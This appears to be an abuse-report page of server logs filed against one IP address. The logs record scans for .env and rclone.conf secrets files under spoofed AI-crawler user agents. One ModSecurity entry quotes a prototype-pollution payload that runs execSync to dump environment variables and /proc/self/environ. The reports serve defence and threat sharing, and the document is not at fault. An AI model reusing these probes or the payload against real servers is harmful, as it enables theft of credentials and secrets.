Anonymous
2026-09-23 10:52:38
(2 hours ago)
35.240.196.71 - - [22/Sep/2026:13:40:22 -0500] "GET /.env?raw HTTP/1.1" 403 199 "-" "Mozilla/5.0 (co ...
show more
35.240.196.71 - - [22/Sep/2026:13:40:22 -0500] "GET /.env?raw HTTP/1.1" 403 199 "-" "Mozilla/5.0 (compatible; MoonshotBot/1.0; +https://kimi.ai/)" 162.158.107.18
35.240.196.71 - - [22/Sep/2026:13:40:22 -0500] "GET /.env?import&raw HTTP/1.1" 403 199 "-" "Mozilla/5.0 (compatible; Hunyuan/1.0; +https://hunyuan.tencent.com/)" 162.158.107.17
35.240.196.71 - - [22/Sep/2026:13:40:22 -0500] "GET /.env.local?raw HTTP/1.1" 403 199 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected] )" 162.158.107.17
35.240.196.71 - - [22/Sep/2026:13:40:22 -0500] "GET /.env?import&url&inline HTTP/1.1" 403 199 "-" "Mozilla/5.0 (compatible; YouBot/1.0; +https://you.com/bot)" 162.158.107.18
35.240.196.71 - - [22/Sep/2026:13:40:22 -0500] "GET /.env.local?import&raw HTTP/1.1" 403 199 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 162.158.107.17
35.240.196.71 - - [22/Sep/2026:13:40:22 -0500] "GET /.env.production?raw HTTP/1.1" 403 19
...
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2026-09-23 03:26:31
(9 hours ago)
Blocked by ModSec and CSF
Port Scan
π«π·
β¨
2026-09-23 01:58:08
(11 hours ago)
Domain : pragma360.com
Rule : env
2026-09-23 01:56:52 ***hidden-privacy*** GET /.env.development raw ...
show more
Domain : pragma360.com
Rule : env
2026-09-23 01:56:52 ***hidden-privacy*** GET /.env.development raw 443 - 35.240.196.71 HTTP/2 CCBot/2.0 (https://commoncrawl.org/faq/) - www.pragma360.com 404 0 0 97856 385 1879 - -
show less
Hacking
SQL Injection
π¦πΊ
Bay13
2026-09-23 00:45:54
(12 hours ago)
CrowdSec:custom/http-probing
Web App Attack
Anonymous
2026-09-22 21:25:12
(15 hours ago)
Bot / seems abusive / Apache connections: 38
DDoS Attack
Web Spam
Bad Web Bot
Web App Attack
π¨π¦
polycoda
2026-09-22 21:19:36
(15 hours ago)
AutoBlock: π‘ Port Scan (Non Decay-Based) - βͺοΈ Excessive 30X Errors (Decay-Based)
Port Scan
Bad Web Bot
π³π±
Eric
2026-09-22 21:12:00
(16 hours ago)
[Tue Sep 22 21:11:56.662547 2026] [security2:error] [pid 3213351:tid 3213351] [client 35.240.196.71: ...
show more
[Tue Sep 22 21:11:56.662547 2026] [security2:error] [pid 3213351:tid 3213351] [client 35.240.196.71:0] [client 35.240.196.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "94"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.pop-the-slots.com"] [uri "/z9x8c7v6b5-debug-trigger-www.pop-the-slots.com"] [unique_id "arLvHGrm-KtFZULiWsTVdQAAAAc"]
[Tue Sep 22 21:11:58.465290 2026] [security2:error] [pid 3103814:tid 3103814] [client 35.240.196.71:0] [client 35.240.196.71] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "94"] [id "949110"] [msg "Inbound Anom
...
show less
Hacking
Web App Attack
πͺπΈ
robotstxt
2026-09-22 19:17:21
(17 hours ago)
35.240.196.71 - - [22/Sep/2026:19:17:00 +0000] "GET / HTTP/2.0" 403 102897 "https://www.mariaplazaca ...
show more
35.240.196.71 - - [22/Sep/2026:19:17:00 +0000] "GET / HTTP/2.0" 403 102897 "https://www.mariaplazacarrasco.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/153.0.0.0 Safari/537.36" "-" edge="35.240.196.71"
35.240.196.71 - - [22/Sep/2026:19:17:02 +0000] "GET / HTTP/2.0" 403 102897 "https://www.mariaplazacarrasco.com/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected] )" "-" edge="35.240.196.71"
35.240.196.71 - - [22/Sep/2026:19:17:04 +0000] "GET /.vite/manifest.json HTTP/2.0" 403 49634 "https://www.mariaplazacarrasco.com/.vite/manifest.json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/153.0.0.0 Safari/537.36" "-" edge="35.240.196.71"
35.240.196.71 - - [22/Sep/2026:19:17:04 +0000] "GET /z9x8c7v6b5-debug-trigger-www.mariaplazacarrasco.com HTTP/2.0" 403 51263 "https://www.mariaplazacarrasco.com/z9x8c7v6b5-debug-trigger-www.mariaplazacarrasco.com" "M
...
show less
Web App Attack
π¨π
4server
2026-09-22 18:22:51
(18 hours ago)
[TueSep2220:22:48.0071572026][security2:error][pid3731004:tid3731041][client35.240.196.71:0]ModSecur ...
show more
[TueSep2220:22:48.0071572026][security2:error][pid3731004:tid3731041][client35.240.196.71:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Matchedphrase\"proc/self/\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"135\"][id\"344360\"][rev\"5\"][msg\"Atomicorp.comWAFRules:UnauthorizedOperatingSystemFileAccessAttempt\"][data\"MatchedData:proc/self/foundwithinARGS:0:{\\\\x22then\\\\x22:\\\\x22\$1:__proto__:then\\\\x22\,\\\\x22status\\\\x22:\\\\x22resolved_model\\\\x22\,\\\\x22reason\\\\x22:-1\,\\\\x22value\\\\x22:\\\\x22{/\\\\x22then/\\\\x22:/\\\\x22\$b1337/\\\\x22}\\\\x22\,\\\\x22_response\\\\x22:{\\\\x22_prefix\\\\x22:\\\\x22process.mainmodule.require\(\'child_process\'\).execsync\(\'env2\>/dev/null\|\|cat/proc/self/environ2\>/dev/null\'\)\;\\\\x22\,\\\\x22_formdata\\\\x22:{\\\\x22get\\\\x22:\\\\x22\$1:constructor:constructor\\\\x22}}}\"][severity\"CRITICAL\"][tag\"attack-lfi\"][hostname\"www.prodotti.comarcosa.com\"][uri\"/\"][unique_id\"arLHeP4FkEn3HmWWaPMT3AAAAYc\"]
show less
Hacking
Web App Attack
πΊπΈ
TPI-Abuse
2026-09-22 17:38:31
(19 hours ago)
(mod_security) mod_security (id:210730) triggered by 35.240.196.71 (71.196.240.35.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 35.240.196.71 (71.196.240.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 22 13:38:25.044381 2026] [security2:error] [pid 18148:tid 18148] [client 35.240.196.71:48408] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||amybeam.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "amybeam.com"] [uri "/z9x8c7v6b5-debug-trigger-amybeam.com"] [unique_id "arK9ER99_aULX2YjjvZjMQAAACQ"]
show less
Brute-Force
Bad Web Bot
Web App Attack
πΊπΈ
TPI-Abuse
2026-09-22 16:55:12
(20 hours ago)
(mod_security) mod_security (id:210730) triggered by 35.240.196.71 (71.196.240.35.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 35.240.196.71 (71.196.240.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 22 12:55:06.073905 2026] [security2:error] [pid 26332:tid 26332] [client 35.240.196.71:56990] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||evelynkay.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "evelynkay.com"] [uri "/z9x8c7v6b5-debug-trigger-evelynkay.com"] [unique_id "arKy6petQ8nhTczCjz9eLgAAAAM"]
show less
Brute-Force
Bad Web Bot
Web App Attack
π³π±
svr
2026-09-22 16:48:25
(20 hours ago)
Abusive Automated Web Scanner
Web App Attack
π©πͺ
SΓ©fora Srl
2026-09-22 16:38:52
(20 hours ago)
crowdsecurity/http-sensitive-files detected by CrowdSec
Web App Attack
πΊπΈ
TPI-Abuse
2026-09-22 16:32:04
(20 hours ago)
(mod_security) mod_security (id:210730) triggered by 35.240.196.71 (71.196.240.35.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 35.240.196.71 (71.196.240.35.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Tue Sep 22 12:31:57.689793 2026] [security2:error] [pid 2320:tid 2320] [client 35.240.196.71:60488] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||jimgrenier.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "jimgrenier.com"] [uri "/z9x8c7v6b5-debug-trigger-jimgrenier.com"] [unique_id "arKtfaFbABLrvG5ZFW-udQAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
π·π΄
clauss
2026-09-22 16:21:52
(20 hours ago)
35.240.196.71 - - [22/Sep/2026:19:21:51 +0300] "GET /rclone.conf HTTP/2.0" 403 146 "-" "Mozilla/5.0 ...
show more
35.240.196.71 - - [22/Sep/2026:19:21:51 +0300] "GET /rclone.conf HTTP/2.0" 403 146 "-" "Mozilla/5.0 (compatible; YiBot/1.0; +https://01.ai/)"
35.240.196.71 - - [22/Sep/2026:19:21:51 +0300] "GET /@fs/.env?raw&url?? HTTP/2.0" 403 146 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Claude-User/1.0; [email protected] )"
...
show less
Web App Attack